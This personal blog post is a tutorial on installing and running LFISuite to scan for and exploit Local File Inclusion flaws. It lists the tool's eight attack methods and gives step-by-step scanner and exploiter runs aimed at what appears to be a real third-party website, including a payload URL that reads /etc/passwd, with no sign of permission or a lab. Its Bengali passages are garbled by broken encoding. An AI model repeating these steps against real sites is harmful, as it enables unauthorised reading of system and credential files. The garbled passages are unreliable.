Personal Blog of

Minhazul Asif

Personal Blog of

Minhazul Asif

LFISuite To scan and exploit LFI Vulnerability

LFISuite scan and exploit LFI Vulnerability

What is LFISuite?

 

LFI Suite is a totally automatic tool able to scan and exploit Local File Inclusion vulnerabilities using many different methods of attack, listed in the section

 

LFI Vulnerability เฆ•เฆฟ?

LFI เฆนเฆฒ เฆเฆ•เฆŸเฆฟ เฆ“เฆฏเฆผเง‡เฆฌ เฆฆเงเฆฐเงเฆฌเฆฒเฆคเฆพ เฆฏเฆพ เฆ“เฆฏเฆผเง‡เฆฌเฆธเฆพเฆ‡เฆŸ เฆฌเฆพ เฆ“เฆฏเฆผเง‡เฆฌ เฆ…เงเฆฏเฆพเฆชเงเฆฒเฆฟเฆ•เง‡เฆถเฆจ เฆชเงเฆฐเง‹เฆ—เงเฆฐเฆพเฆฎเฆพเฆฐเฆฆเง‡เฆฐ เฆญเงเฆฒเง‡เฆฐ เฆซเฆฒเง‡ เฆนเฆฏเฆผเฅค เฆนเงเฆฏเฆพเฆ•เฆพเฆฐ Malicious เฆซเฆพเฆ‡เฆฒเฆ—เงเฆฒเฆฟ Inject เฆ•เฆฐเฆพเฆฐ เฆœเฆจเงเฆฏ เฆเฆ‡ เฆฆเงเฆฐเงเฆฌเฆฒเฆคเฆพเฆฐ เฆธเงเฆฌเฆฟเฆงเฆพ เฆจเฆฟเฆคเง‡ เฆชเฆพเฆฐเง‡ เฆฏเฆพเฆฐ เฆฎเฆพเฆฆเงเฆงเฆฎเง‡ เฆ“เงŸเง‡เฆฌเฆธเฆพเฆ‡เฆŸ / เฆ“เงŸเง‡เฆฌ เฆเฆชเงเฆฒเฆฟเฆ•เง‡เฆถเฆจ เฆ เฆเฆ•เงเฆธเง‡เฆธ เฆจเฆฟเฆคเง‡ เฆชเฆพเฆฐเง‡เฅค

 

LFI Suite Provides 8 different Local File Inclusion attack modalities:


โ— /proc/self/environ
โ— php://filter
โ— php://input
โ— /proc/self/fd
โ— access log
โ— phpinfo
โ— data://
โ— expect://

 

How to Use LFI Suite

 

> Kali > sudo su > password
> cd Desktop
> git clone https://github.com/D35m0nd142/LFISuite
> cd LFISuite
> ls
> la -la
> chmod +x lfisuite.py
> python2 lfisuite.py

lfusuite


If you get error put this cmd in kali

cp -r /usr/lib/python3/dist-packages/termcolor.py /usr/lib/python2.7/dist-packages

 

LFI Suite Scanner

 

โ— for scan select 2
โ— cookoies: enter
โ— tor proxy: no
โ— paths: enter
โ— url to scan: https://ravagedband.com/index.php?page=home.php

lfusuite

 


Check LFI Vulnerability

LFI Suite will scan your link and find LFI Vulnerability of your link (CNTRL + Z to stop scanning)

lfusuite

 

LFI Suite Exploiter

 

โ— for Exploiter select 1
โ— cookoies: enter
โ— tor proxy: no
โ— choose payloads: 1
โ— enter Vulnerabile URL: https://ravagedband.com/index.php?page=/etc/passwd
โ— choose parameter: 1

Now it will show you the result

lfusuite

 

Read more ethical hacking blogs from here.

 

 

Share on -

Related Articles

เฆ…เฆจเฆฒเฆพเฆ‡เฆจเง‡ เฆซเง‡เฆ‡เฆ• เฆ•เงเฆฒเฆพเงŸเง‡เฆจเงเฆŸ เฆ•เฆฟเฆญเฆพเฆฌเง‡ เฆšเฆฟเฆจเฆฌเง‡เฆจ?

เฆ…เฆจเฆฒเฆพเฆ‡เฆจเง‡ เฆซเง‡เฆ‡เฆ• เฆ•เงเฆฒเฆพเงŸเง‡เฆจเงเฆŸ เฆ•เฆฟเฆญเฆพเฆฌเง‡ เฆšเฆฟเฆจเฆฌเง‡เฆจ? : เฆซเง‡เฆ‡เฆ• เฆ•เงเฆฒเฆพเงŸเง‡เฆจเงเฆŸ เฆฅเง‡เฆ•เง‡ เฆฆเง‚เฆฐเง‡ เฆฅเฆพเฆ•เงเฆจ

เฆซเง‡เฆ‡เฆ• เฆ•เงเฆฒเฆพเงŸเง‡เฆจเงเฆŸ เฆฅเง‡เฆ•เง‡ เฆฆเง‚เฆฐเง‡ เฆฅเฆพเฆ•เงเฆจเฅค เฆซเง‡เฆ‡เฆ• เฆ•เงเฆฒเฆพเงŸเง‡เฆจเงเฆŸ เฆšเฆฟเฆจเฆฌเง‡เฆจ เฆ•เฆฟเฆญเฆพเฆฌเง‡? เฆซเงเฆฐเฆฟเฆฒเงเฆฏเฆพเฆจเงเฆธ

view post

เฆชเฆพเฆฐเงเฆŸ เฆŸเฆพเฆ‡เฆฎ เฆ‡เฆจเฆ•เฆพเฆฎ เฆ…เฆชเฆฐเฆšเงเฆจเฆฟเฆŸเฆฟ : เฆ…เฆจเฆฒเฆพเฆ‡เฆจ เฆ‡เฆจเฆญเง‡เฆธเงเฆŸเฆฎเง‡เฆจเงเฆŸ เฆธเงเฆ•เงเฆฏเฆพเฆฎ

เฆงเฆฐเงเฆจ เฆฌเฆพเฆ‚เฆฒเฆพเฆฆเง‡เฆถเฆฟ เฆ•เง‡เฆ“ เฆ†เฆชเฆจเฆพเฆ•เง‡ เฆ‡เฆจเฆฌเฆ•เงเฆธเง‡ เฆ…เฆฅเฆฌเฆพ เฆนเง‹เฆฏเฆผเฆพเฆŸเฆธเฆ…เงเฆฏเฆพเฆช เฆ เฆฎเง‡เฆธเง‡เฆœ เฆฆเฆฟเงŸเง‡

view post
minhazul asif

เฆ†เฆฎเฆฟ เฆฎเฆฟเฆจเฆนเฆพเฆœเงเฆฒ เฆ†เฆธเฆฟเฆซ,

Entrepreneur, Instructor, Web Developer, Freelancer & Cyber Sucurity Expert.

เฆจเฆฟเฆœเง‡เฆฐ เฆ†เฆ‡เฆกเฆฟเงŸเฆพ เฆ—เงเฆฒเง‹ เฆธเฆฌเฆพเฆฐ เฆธเฆพเฆฅเง‡ เฆถเง‡เงŸเฆพเฆฐ เฆ•เฆฐเฆพเฆฐ เฆœเฆจเงเฆฏ เฆเฆ‡ เฆฌเงเฆฒเฆ— เฆ“เงŸเง‡เฆฌเฆธเฆพเฆ‡เฆŸ เฆคเงˆเฆฐเง€ เฆ•เฆฐเฆพเฅค เฆ†เฆถเฆพ เฆ•เฆฐเฆฟ เฆ†เฆฎเฆพเฆฐ เฆฌเงเฆฒเฆ— เฆชเงœเง‡ เฆ…เฆจเง‡เฆ•เง‡เฆ‡ เฆ‰เฆชเฆ•เงƒเฆค เฆนเฆฌเง‡เฅค

เฆ•เงเฆฏเฆพเฆŸเฆพเฆ—เฆฐเฆฟ เฆธเฆฎเง‚เฆน: